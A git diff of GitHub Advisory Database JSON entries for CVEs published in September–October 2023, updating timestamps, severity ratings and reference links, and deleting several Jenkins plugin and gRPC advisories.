b/advisories/unreviewed/2023/09/GHSA-mwc5-mc4g-5jw5/GHSA-mwc5-mc4g-5jw5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mwc5-mc4g-5jw5", - "modified": "2023-09-15T15:30:14Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4909" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:09Z" diff --git a/advisories/unreviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json b/advisories/unreviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json deleted file mode 100644 index 59c249bf703e2..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-p25m-jpj4-qcrr/GHSA-p25m-jpj4-qcrr.json +++ /dev/null @@ -1,54 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-p25m-jpj4-qcrr", - "modified": "2023-09-13T18:31:26Z", - "published": "2023-09-13T18:31:26Z", - "aliases": [ - "CVE-2023-4785" - ], - "details": "Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++ Python, and Ruby are affected, but gRPC Java, and Go are NOT affected. ", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4785" - }, - { - "type": "WEB", - "url": "https://github.com/grpc/grpc/pull/33656" - }, - { - "type": "WEB", - "url": "https://github.com/grpc/grpc/pull/33667" - }, - { - "type": "WEB", - "url": "https://github.com/grpc/grpc/pull/33669" - }, - { - "type": "WEB", - "url": "https://github.com/grpc/grpc/pull/33670" - }, - { - "type": "WEB", - "url": "https://github.com/grpc/grpc/pull/33672" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-248" - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-13T17:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-p489-ffhp-rw3f/GHSA-p489-ffhp-rw3f.json b/advisories/unreviewed/2023/09/GHSA-p489-ffhp-rw3f/GHSA-p489-ffhp-rw3f.json index fb9d7cd1a7ec1..f3219e0f3c16f 100644 --- a/advisories/unreviewed/2023/09/GHSA-p489-ffhp-rw3f/GHSA-p489-ffhp-rw3f.json +++ b/advisories/unreviewed/2023/09/GHSA-p489-ffhp-rw3f/GHSA-p489-ffhp-rw3f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p489-ffhp-rw3f", - "modified": "2023-09-28T15:30:16Z", + "modified": "2024-01-31T15:30:18Z", "published": "2023-09-27T15:30:36Z", "aliases": [ "CVE-2023-40451" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40451" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213941" @@ -38,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-27T15:19:17Z" diff --git a/advisories/unreviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json b/advisories/unreviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json deleted file mode 100644 index d1dfa7bab562f..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-p986-hpr3-493p/GHSA-p986-hpr3-493p.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-p986-hpr3-493p", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41947" - ], - "details": "A missing permission check in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers with Overall/Read permission to connect to Frugal Testing using attacker-specified credentials.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41947" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3082" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json b/advisories/unreviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json deleted file mode 100644 index 1aa91323009b7..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-pfg6-cj3j-rpv4/GHSA-pfg6-cj3j-rpv4.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pfg6-cj3j-rpv4", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41941" - ], - "details": "A missing permission check in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of AWS credentials stored in Jenkins.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41941" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(1)" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-ppmf-rp3c-49x9/GHSA-ppmf-rp3c-49x9.json b/advisories/unreviewed/2023/09/GHSA-ppmf-rp3c-49x9/GHSA-ppmf-rp3c-49x9.json index a29e947085fff..3fb9b0461811b 100644 --- a/advisories/unreviewed/2023/09/GHSA-ppmf-rp3c-49x9/GHSA-ppmf-rp3c-49x9.json +++ b/advisories/unreviewed/2023/09/GHSA-ppmf-rp3c-49x9/GHSA-ppmf-rp3c-49x9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-ppmf-rp3c-49x9", - "modified": "2023-09-13T06:30:21Z", + "modified": "2024-01-30T21:30:28Z", "published": "2023-09-12T00:30:26Z", "aliases": [ "CVE-2023-40440" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40440" }, + { + "type": "WEB", + "url": "https://blog.aegrel.ee/apple-mail-smime.html" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213844" @@ -30,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T00:15:09Z" diff --git a/advisories/unreviewed/2023/09/GHSA-prc6-xmpq-r4g3/GHSA-prc6-xmpq-r4g3.json b/advisories/unreviewed/2023/09/GHSA-prc6-xmpq-r4g3/GHSA-prc6-xmpq-r4g3.json index f03a0e934d167..e40eca79c9860 100644 --- a/advisories/unreviewed/2023/09/GHSA-prc6-xmpq-r4g3/GHSA-prc6-xmpq-r4g3.json +++ b/advisories/unreviewed/2023/09/GHSA-prc6-xmpq-r4g3/GHSA-prc6-xmpq-r4g3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-prc6-xmpq-r4g3", - "modified": "2023-10-05T15:30:15Z", + "modified": "2024-02-02T18:30:24Z", "published": "2023-09-28T00:30:21Z", "aliases": [ "CVE-2023-43320" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://bugzilla.proxmox.com/show_bug.cgi?id=4584" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176967/Proxmox-VE-7.4-1-TOTP-Brute-Force.html" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-27T23:15:12Z" diff --git a/advisories/unreviewed/2023/09/GHSA-prfg-cph5-wq68/GHSA-prfg-cph5-wq68.json b/advisories/unreviewed/2023/09/GHSA-prfg-cph5-wq68/GHSA-prfg-cph5-wq68.json index 451e60c2f22f2..e84bd75d65b27 100644 --- a/advisories/unreviewed/2023/09/GHSA-prfg-cph5-wq68/GHSA-prfg-cph5-wq68.json +++ b/advisories/unreviewed/2023/09/GHSA-prfg-cph5-wq68/GHSA-prfg-cph5-wq68.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-prfg-cph5-wq68", - "modified": "2023-09-16T00:30:30Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-09-16T00:30:30Z", "aliases": [ "CVE-2023-36727" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36727" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-15T22:15:13Z" diff --git a/advisories/unreviewed/2023/09/GHSA-q9jw-w6mv-2j54/GHSA-q9jw-w6mv-2j54.json b/advisories/unreviewed/2023/09/GHSA-q9jw-w6mv-2j54/GHSA-q9jw-w6mv-2j54.json index 1427beb192e6f..54b1c8b047257 100644 --- a/advisories/unreviewed/2023/09/GHSA-q9jw-w6mv-2j54/GHSA-q9jw-w6mv-2j54.json +++ b/advisories/unreviewed/2023/09/GHSA-q9jw-w6mv-2j54/GHSA-q9jw-w6mv-2j54.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q9jw-w6mv-2j54", - "modified": "2023-09-15T15:30:14Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4904" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:08Z" diff --git a/advisories/unreviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json b/advisories/unreviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json deleted file mode 100644 index 593f1d8130666..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-qf42-f5vf-6w99/GHSA-qf42-f5vf-6w99.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-qf42-f5vf-6w99", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41945" - ], - "details": "Jenkins Assembla Auth Plugin 1.14 and earlier does not verify that the permissions it grants are enabled, resulting in users with EDIT permissions to be granted Overall/Manage and Overall/SystemRead permissions, even if those permissions are disabled and should not be granted.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41945" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3065" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-qf8c-938w-pvrw/GHSA-qf8c-938w-pvrw.json b/advisories/unreviewed/2023/09/GHSA-qf8c-938w-pvrw/GHSA-qf8c-938w-pvrw.json index e46d61bcaefe0..ca64e2344f4e4 100644 --- a/advisories/unreviewed/2023/09/GHSA-qf8c-938w-pvrw/GHSA-qf8c-938w-pvrw.json +++ b/advisories/unreviewed/2023/09/GHSA-qf8c-938w-pvrw/GHSA-qf8c-938w-pvrw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qf8c-938w-pvrw", - "modified": "2023-09-29T18:30:22Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-28T18:30:45Z", "aliases": [ "CVE-2023-5186" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5508" @@ -50,7 +54,7 @@ "cwe_ids": [ "CWE-416" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-28T16:15:10Z" diff --git a/advisories/unreviewed/2023/09/GHSA-qr34-fv3w-3x4j/GHSA-qr34-fv3w-3x4j.json b/advisories/unreviewed/2023/09/GHSA-qr34-fv3w-3x4j/GHSA-qr34-fv3w-3x4j.json index fff4c7c6a873c..5ab16413af077 100644 --- a/advisories/unreviewed/2023/09/GHSA-qr34-fv3w-3x4j/GHSA-qr34-fv3w-3x4j.json +++ b/advisories/unreviewed/2023/09/GHSA-qr34-fv3w-3x4j/GHSA-qr34-fv3w-3x4j.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-qr34-fv3w-3x4j", - "modified": "2023-09-29T00:30:15Z", + "modified": "2024-01-29T21:30:25Z", "published": "2023-09-27T15:30:34Z", "aliases": [ "CVE-2023-35793" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35793" }, + { + "type": "WEB", + "url": "https://blog.kscsc.online/cves/202335793/md.html" + }, { "type": "WEB", "url": "https://github.com/Dodge-MPTC/CVE-2023-35793-CSRF-On-Web-SSH" @@ -34,7 +38,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-27T15:18:52Z" diff --git a/advisories/unreviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json b/advisories/unreviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json deleted file mode 100644 index cd95d4f6c0fe7..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-r428-g373-m2h4/GHSA-r428-g373-m2h4.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-r428-g373-m2h4", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41943" - ], - "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not perform a permission check in an HTTP endpoint, allowing attackers with Overall/Read permission to clear the SQS queue.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41943" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(2)" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:11Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-r735-966q-57pq/GHSA-r735-966q-57pq.json b/advisories/unreviewed/2023/09/GHSA-r735-966q-57pq/GHSA-r735-966q-57pq.json index bdc2e441710f8..2234a0bc7985b 100644 --- a/advisories/unreviewed/2023/09/GHSA-r735-966q-57pq/GHSA-r735-966q-57pq.json +++ b/advisories/unreviewed/2023/09/GHSA-r735-966q-57pq/GHSA-r735-966q-57pq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-r735-966q-57pq", - "modified": "2023-09-15T18:30:30Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4902" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:08Z" diff --git a/advisories/unreviewed/2023/09/GHSA-v792-wxjq-p469/GHSA-v792-wxjq-p469.json b/advisories/unreviewed/2023/09/GHSA-v792-wxjq-p469/GHSA-v792-wxjq-p469.json index 1b4ca0d8a4527..44e92564f91b9 100644 --- a/advisories/unreviewed/2023/09/GHSA-v792-wxjq-p469/GHSA-v792-wxjq-p469.json +++ b/advisories/unreviewed/2023/09/GHSA-v792-wxjq-p469/GHSA-v792-wxjq-p469.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v792-wxjq-p469", - "modified": "2023-09-20T18:30:20Z", + "modified": "2024-02-02T18:30:24Z", "published": "2023-09-15T15:30:15Z", "aliases": [ "CVE-2023-42270" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42270" }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176958/Grocy-4.0.2-Cross-Site-Request-Forgery.html" + }, { "type": "WEB", "url": "http://xploit.sh/posts/cve-2023-xxxxx/" @@ -30,7 +34,7 @@ "cwe_ids": [ "CWE-352" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-15T14:15:11Z" diff --git a/advisories/unreviewed/2023/09/GHSA-vm6c-x6px-r22m/GHSA-vm6c-x6px-r22m.json b/advisories/unreviewed/2023/09/GHSA-vm6c-x6px-r22m/GHSA-vm6c-x6px-r22m.json index caa7fcb655559..2f8bfd03b8a4b 100644 --- a/advisories/unreviewed/2023/09/GHSA-vm6c-x6px-r22m/GHSA-vm6c-x6px-r22m.json +++ b/advisories/unreviewed/2023/09/GHSA-vm6c-x6px-r22m/GHSA-vm6c-x6px-r22m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vm6c-x6px-r22m", - "modified": "2023-09-29T18:30:22Z", + "modified": "2024-02-02T18:30:24Z", "published": "2023-09-28T03:30:19Z", "aliases": [ "CVE-2023-42222" @@ -32,13 +32,17 @@ { "type": "WEB", "url": "https://www.electronjs.org/docs/latest/tutorial/security#15-do-not-use-shellopenexternal-with-untrusted-content" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176957/WebCatalog-48.4-Arbitrary-Protocol-Execution-Code-Execution.html" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-28T03:15:11Z" diff --git a/advisories/unreviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json b/advisories/unreviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json deleted file mode 100644 index 2ef88ffacfc26..0000000000000 --- a/advisories/unreviewed/2023/09/GHSA-vrpg-c7c4-8mpx/GHSA-vrpg-c7c4-8mpx.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-vrpg-c7c4-8mpx", - "modified": "2023-09-06T15:30:26Z", - "published": "2023-09-06T15:30:26Z", - "aliases": [ - "CVE-2023-41937" - ], - "details": "Jenkins Bitbucket Push and Pull Request Plugin 2.4.0 through 2.8.3 (both inclusive) trusts values provided in the webhook payload, including certain URLs, and uses configured Bitbucket credentials to connect to those URLs, allowing attackers to capture Bitbucket credentials stored in Jenkins by sending a crafted webhook payload.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41937" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3165" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-09-06T13:15:10Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/09/GHSA-w5c6-c6wv-54h7/GHSA-w5c6-c6wv-54h7.json b/advisories/unreviewed/2023/09/GHSA-w5c6-c6wv-54h7/GHSA-w5c6-c6wv-54h7.json index 8d301292c82cd..08fe3dac4e004 100644 --- a/advisories/unreviewed/2023/09/GHSA-w5c6-c6wv-54h7/GHSA-w5c6-c6wv-54h7.json +++ b/advisories/unreviewed/2023/09/GHSA-w5c6-c6wv-54h7/GHSA-w5c6-c6wv-54h7.json @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://kb.isc.org/docs/cve-2023-3341" }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00021.html" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IPJLLTJCSDJJII7IIZPLTBQNWP7MZH7F/" diff --git a/advisories/unreviewed/2023/09/GHSA-w5h6-8xc7-vp2c/GHSA-w5h6-8xc7-vp2c.json b/advisories/unreviewed/2023/09/GHSA-w5h6-8xc7-vp2c/GHSA-w5h6-8xc7-vp2c.json index 30eb82488987b..467c977ebe7a8 100644 --- a/advisories/unreviewed/2023/09/GHSA-w5h6-8xc7-vp2c/GHSA-w5h6-8xc7-vp2c.json +++ b/advisories/unreviewed/2023/09/GHSA-w5h6-8xc7-vp2c/GHSA-w5h6-8xc7-vp2c.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w5h6-8xc7-vp2c", - "modified": "2023-09-22T03:30:50Z", + "modified": "2024-02-02T15:30:28Z", "published": "2023-09-21T00:31:16Z", "aliases": [ "CVE-2023-36234" @@ -30,7 +30,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-20T22:15:12Z" diff --git a/advisories/unreviewed/2023/09/GHSA-w5hv-g8p5-vwjr/GHSA-w5hv-g8p5-vwjr.json b/advisories/unreviewed/2023/09/GHSA-w5hv-g8p5-vwjr/GHSA-w5hv-g8p5-vwjr.json index 116322334b66e..44396000cb241 100644 --- a/advisories/unreviewed/2023/09/GHSA-w5hv-g8p5-vwjr/GHSA-w5hv-g8p5-vwjr.json +++ b/advisories/unreviewed/2023/09/GHSA-w5hv-g8p5-vwjr/GHSA-w5hv-g8p5-vwjr.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5491" diff --git a/advisories/unreviewed/2023/09/GHSA-whx3-c4j7-hh43/GHSA-whx3-c4j7-hh43.json b/advisories/unreviewed/2023/09/GHSA-whx3-c4j7-hh43/GHSA-whx3-c4j7-hh43.json index 4c8a0c7389e2a..c498502ff8150 100644 --- a/advisories/unreviewed/2023/09/GHSA-whx3-c4j7-hh43/GHSA-whx3-c4j7-hh43.json +++ b/advisories/unreviewed/2023/09/GHSA-whx3-c4j7-hh43/GHSA-whx3-c4j7-hh43.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-whx3-c4j7-hh43", - "modified": "2023-09-15T15:30:14Z", + "modified": "2024-01-31T18:31:20Z", "published": "2023-09-12T21:30:17Z", "aliases": [ "CVE-2023-4908" @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WTRUIS3564P7ZLM2S2IH4Y4KZ327LI4I/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5499" @@ -50,7 +54,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-12T21:15:09Z" diff --git a/advisories/unreviewed/2023/09/GHSA-xq9m-9whg-jv3m/GHSA-xq9m-9whg-jv3m.json b/advisories/unreviewed/2023/09/GHSA-xq9m-9whg-jv3m/GHSA-xq9m-9whg-jv3m.json index edf7d54d521d0..10b46785ee54f 100644 --- a/advisories/unreviewed/2023/09/GHSA-xq9m-9whg-jv3m/GHSA-xq9m-9whg-jv3m.json +++ b/advisories/unreviewed/2023/09/GHSA-xq9m-9whg-jv3m/GHSA-xq9m-9whg-jv3m.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xq9m-9whg-jv3m", - "modified": "2023-09-28T18:30:44Z", + "modified": "2024-01-31T15:30:18Z", "published": "2023-09-27T15:30:36Z", "aliases": [ "CVE-2023-41074" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EEMDC5TQAANFH5D77QM34ZTUKXPFGVL/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-33" + }, { "type": "WEB", "url": "https://support.apple.com/en-us/HT213936" @@ -78,7 +82,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-09-27T15:19:26Z" diff --git a/advisories/unreviewed/2023/10/GHSA-294c-hpxh-5qrx/GHSA-294c-hpxh-5qrx.json b/advisories/unreviewed/2023/10/GHSA-294c-hpxh-5qrx/GHSA-294c-hpxh-5qrx.json index 3ce18a415216d..44f138718ad0b 100644 --- a/advisories/unreviewed/2023/10/GHSA-294c-hpxh-5qrx/GHSA-294c-hpxh-5qrx.json +++ b/advisories/unreviewed/2023/10/GHSA-294c-hpxh-5qrx/GHSA-294c-hpxh-5qrx.json @@ -61,6 +61,10 @@ "type": "WEB", "url": "https://lists.x.org/archives/xorg-announce/2023-October/003430.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-30" + }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231130-0004/" diff --git a/advisories/unreviewed/2023/10/GHSA-3r5f-38cp-r8x3/GHSA-3r5f-38cp-r8x3.json b/advisories/unreviewed/2023/10/GHSA-3r5f-38cp-r8x3/GHSA-3r5f-38cp-r8x3.json index 76df28c930d46..901f6730d9915 100644 --- a/advisories/unreviewed/2023/10/GHSA-3r5f-38cp-r8x3/GHSA-3r5f-38cp-r8x3.json +++ b/advisories/unreviewed/2023/10/GHSA-3r5f-38cp-r8x3/GHSA-3r5f-38cp-r8x3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3r5f-38cp-r8x3", - "modified": "2023-10-11T18:30:27Z", + "modified": "2024-02-05T18:31:36Z", "published": "2023-10-04T12:30:14Z", "aliases": [ "CVE-2023-43261" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://github.com/win3zz/CVE-2023-43261" }, + { + "type": "WEB", + "url": "https://medium.com/%40win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf" + }, { "type": "WEB", "url": "https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf" @@ -37,6 +41,10 @@ "type": "WEB", "url": "http://milesight.com" }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/176988/Milesight-UR5X-UR32L-UR32-UR35-UR41-Credential-Leakage.html" + }, { "type": "WEB", "url": "http://ur5x.com" @@ -46,7 +54,7 @@ "cwe_ids": [ "CWE-532" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-04T12:15:10Z" diff --git a/advisories/unreviewed/2023/10/GHSA-4vx7-4j56-j894/GHSA-4vx7-4j56-j894.json b/advisories/unreviewed/2023/10/GHSA-4vx7-4j56-j894/GHSA-4vx7-4j56-j894.json index 4c0ab28afb6b6..fcd188649a6ab 